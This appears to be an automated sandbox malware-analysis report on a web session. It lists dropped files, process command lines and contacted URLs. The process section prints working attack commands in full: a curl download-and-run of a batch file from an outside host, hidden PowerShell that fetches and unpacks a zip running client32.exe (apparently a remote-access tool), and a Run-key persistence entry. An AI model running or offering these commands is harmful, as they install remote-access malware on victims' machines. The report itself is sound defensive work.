Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\ProgramData\xss.bat
|
ASCII text, with very long lines (26823)
|
dropped
|
 |
|
|
C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\NSM.LIC
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\branding.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\client32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\hw.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\msvcr100.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\pcicapi.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Program.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mg2ywird.xqp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtgkoksc.wue.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny4jkaeu.wzk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtfog15h.3df.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Directory\NSM.ini
|
Generic INItialization configuration [Features]
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Directory\client32.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Directory\nskbfltr.inf
|
Windows setup INFormation
|
dropped
|
||
|
Chrome Cache Entry: 204
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1880x930, components
3
|
dropped
|
||
|
Chrome Cache Entry: 205
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 206
|
PNG image data, 33 x 40, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 207
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
dropped
|
||
|
Chrome Cache Entry: 208
|
PNG image data, 1721 x 732, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 209
|
PNG image data, 5821 x 1103, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 210
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 211
|
PNG image data, 98 x 142, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 212
|
JPEG image data, progressive, precision 8, 1200x800, components 3
|
dropped
|
||
|
Chrome Cache Entry: 213
|
PNG image data, 5821 x 1103, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 214
|
PNG image data, 400 x 270, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 215
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 216
|
gzip compressed data, from Unix, original size modulo 2^32 22116
|
downloaded
|
||
|
Chrome Cache Entry: 217
|
PNG image data, 44 x 41, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 218
|
PNG image data, 33 x 40, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 219
|
gzip compressed data, from Unix, original size modulo 2^32 89501
|
downloaded
|
||
|
Chrome Cache Entry: 220
|
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data,
little-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop
CS3 Windows, datetime=2022:09:05 16:18:51], progressive, precision 8, 376x850, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 221
|
PNG image data, 44 x 41, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 222
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
dropped
|
||
|
Chrome Cache Entry: 223
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
dropped
|
||
|
Chrome Cache Entry: 224
|
PNG image data, 98 x 142, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 225
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
dropped
|
||
|
Chrome Cache Entry: 226
|
JPEG image data, progressive, precision 8, 1200x800, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 227
|
PNG image data, 14 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 228
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 229
|
ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
|
downloaded
|
||
|
Chrome Cache Entry: 230
|
PNG image data, 14 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 231
|
PNG image data, 1721 x 732, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 232
|
PNG image data, 40 x 37, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 233
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1962x1000, components
3
|
dropped
|
||
|
Chrome Cache Entry: 234
|
PNG image data, 40 x 37, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 235
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
dropped
|
||
|
Chrome Cache Entry: 236
|
PNG image data, 200 x 200, 16-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 237
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
dropped
|
||
|
Chrome Cache Entry: 238
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 239
|
GIF image data, version 89a, 1 x 1
|
dropped
|
||
|
Chrome Cache Entry: 240
|
gzip compressed data, from Unix, original size modulo 2^32 7057
|
downloaded
|
||
|
Chrome Cache Entry: 241
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 242
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 243
|
PNG image data, 14 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 244
|
PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 245
|
PNG image data, 14 x 21, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 246
|
PNG image data, 67 x 67, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 247
|
PNG image data, 38 x 41, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 248
|
PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 249
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 250
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 251
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x618, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 252
|
gzip compressed data, max compression, truncated
|
downloaded
|
||
|
Chrome Cache Entry: 253
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 254
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 255
|
PNG image data, 5821 x 1103, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 256
|
PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 257
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1962x1000, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 258
|
gzip compressed data, from Unix, original size modulo 2^32 4685
|
downloaded
|
||
|
Chrome Cache Entry: 259
|
Web Open Font Format (Version 2), TrueType, length 49332, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 260
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 261
|
PNG image data, 33 x 40, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 262
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 263
|
PNG image data, 40 x 37, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 264
|
PNG image data, 41 x 41, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 265
|
PNG image data, 200 x 200, 16-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 266
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 267
|
gzip compressed data, from Unix, original size modulo 2^32 40401
|
downloaded
|
||
|
Chrome Cache Entry: 268
|
gzip compressed data, from Unix, original size modulo 2^32 137
|
downloaded
|
||
|
Chrome Cache Entry: 269
|
PNG image data, 40 x 37, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 270
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 271
|
gzip compressed data, from Unix, original size modulo 2^32 6359
|
downloaded
|
||
|
Chrome Cache Entry: 272
|
gzip compressed data, from Unix, original size modulo 2^32 17860
|
downloaded
|
||
|
Chrome Cache Entry: 273
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1880x930, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 274
|
PNG image data, 67 x 67, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 275
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
dropped
|
||
|
Chrome Cache Entry: 276
|
PNG image data, 14 x 21, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 277
|
PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 278
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
dropped
|
||
|
Chrome Cache Entry: 279
|
PNG image data, 41 x 41, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 280
|
PNG image data, 33 x 40, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 281
|
gzip compressed data, from Unix, original size modulo 2^32 3364
|
downloaded
|
||
|
Chrome Cache Entry: 282
|
gzip compressed data, from Unix, original size modulo 2^32 125652
|
downloaded
|
||
|
Chrome Cache Entry: 283
|
PNG image data, 77 x 77, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 284
|
PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 285
|
gzip compressed data, from Unix, original size modulo 2^32 53438
|
downloaded
|
||
|
Chrome Cache Entry: 286
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 287
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 288
|
PNG image data, 258 x 258, 8-bit/color RGB, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 289
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
dropped
|
||
|
Chrome Cache Entry: 290
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 291
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 292
|
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data,
little-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop
CS3 Windows, datetime=2022:09:05 16:18:51], progressive, precision 8, 376x850, components 3
|
dropped
|
||
|
Chrome Cache Entry: 293
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 294
|
PNG image data, 67 x 67, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 295
|
data
|
downloaded
|
||
|
Chrome Cache Entry: 296
|
PNG image data, 400 x 270, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 297
|
Web Open Font Format (Version 2), TrueType, length 32420, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 298
|
PNG image data, 14 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 299
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 32x32, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 300
|
PNG image data, 38 x 41, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 301
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
dropped
|
||
|
Chrome Cache Entry: 302
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 303
|
PNG image data, 290 x 44, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 304
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
dropped
|
||
|
Chrome Cache Entry: 305
|
GIF image data, version 89a, 1 x 1
|
downloaded
|
||
|
Chrome Cache Entry: 306
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 307
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 308
|
PNG image data, 290 x 44, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 309
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 310
|
PNG image data, 5821 x 1103, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 311
|
gzip compressed data, from Unix, original size modulo 2^32 612510
|
downloaded
|
||
|
Chrome Cache Entry: 312
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 313
|
PNG image data, 77 x 77, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 314
|
gzip compressed data, from Unix, original size modulo 2^32 14367
|
downloaded
|
||
|
Chrome Cache Entry: 315
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x800, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 316
|
gzip compressed data, from Unix, original size modulo 2^32 134618
|
downloaded
|
||
|
Chrome Cache Entry: 317
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 32x32, components 3
|
dropped
|
||
|
Chrome Cache Entry: 318
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x618, components
3
|
dropped
|
||
|
Chrome Cache Entry: 319
|
PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 320
|
data
|
downloaded
|
||
|
Chrome Cache Entry: 321
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1440, components 3
|
dropped
|
||
|
Chrome Cache Entry: 322
|
PNG image data, 67 x 67, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 323
|
PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 324
|
PNG image data, 258 x 258, 8-bit/color RGB, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 325
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 376x850, components
3
|
dropped
|
There are 159 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3220,i,14266024722842573986,13548840143605449493,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3268 /prefetch:3
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.focuslight.com/"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /K C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php"
-o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php"
-o "C:\ProgramData\xss.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o
"C:\ProgramData\xss.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
|
|
|
|
C:\Windows\SysWOW64\curl.exe
|
C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781'
-OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip',
'C:\Users\user\AppData\Roaming\Directory')"
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\client32.exe
|
"C:\Users\user\AppData\Roaming\Directory\client32.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\client32.exe
|
"C:\Users\user\AppData\Roaming\Directory\client32.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\Directory\client32.exe
|
"C:\Users\user\AppData\Roaming\Directory\client32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe"
/f
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.focuslight.com/
|
|
||
|
https://www.insideedgepr.com/header.php
|
141.193.213.10
|
|
|
|
https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781
|
141.193.213.10
|
|
|
|
http://5.252.178.123/fakeurl.htm
|
5.252.178.123
|
|
|
|
https://ace-project.org/d.js
|
162.214.153.12
|
|
|
|
http://www.pci.co.uk/support
|
unknown
|
||
|
http://%s/testpage.htmwininet.dll
|
unknown
|
||
|
https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c7811/
|
unknown
|
||
|
http://geo.netsupportsoftware.com/location/loca.asp
|
unknown
|
||
|
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
|
unknown
|
||
|
https://meimei68.top/lsass/jsson.js
|
77.83.199.73
|
||
|
http://www.pci.co.uk/supportsupport
|
unknown
|
||
|
http://ocsp.thawte.com0
|
unknown
|
||
|
https://meimei68.top/lsass/index.js?8a7441451c8ad03d76
|
77.83.199.73
|
||
|
https://www.insideedgepr.com/header.phpj
|
unknown
|
||
|
https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg
|
47.79.48.222
|
||
|
http://127.0.0.1RESUMEPRINTING
|
unknown
|
||
|
http://c.pki.goog/r/r4.crl
|
74.125.137.94
|
||
|
http://%s/testpage.htm
|
unknown
|
||
|
http://www.counter-strike.net/cheat.html
|
unknown
|
||
|
http://127.0.0.1
|
unknown
|
||
|
https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781s=
|
unknown
|
||
|
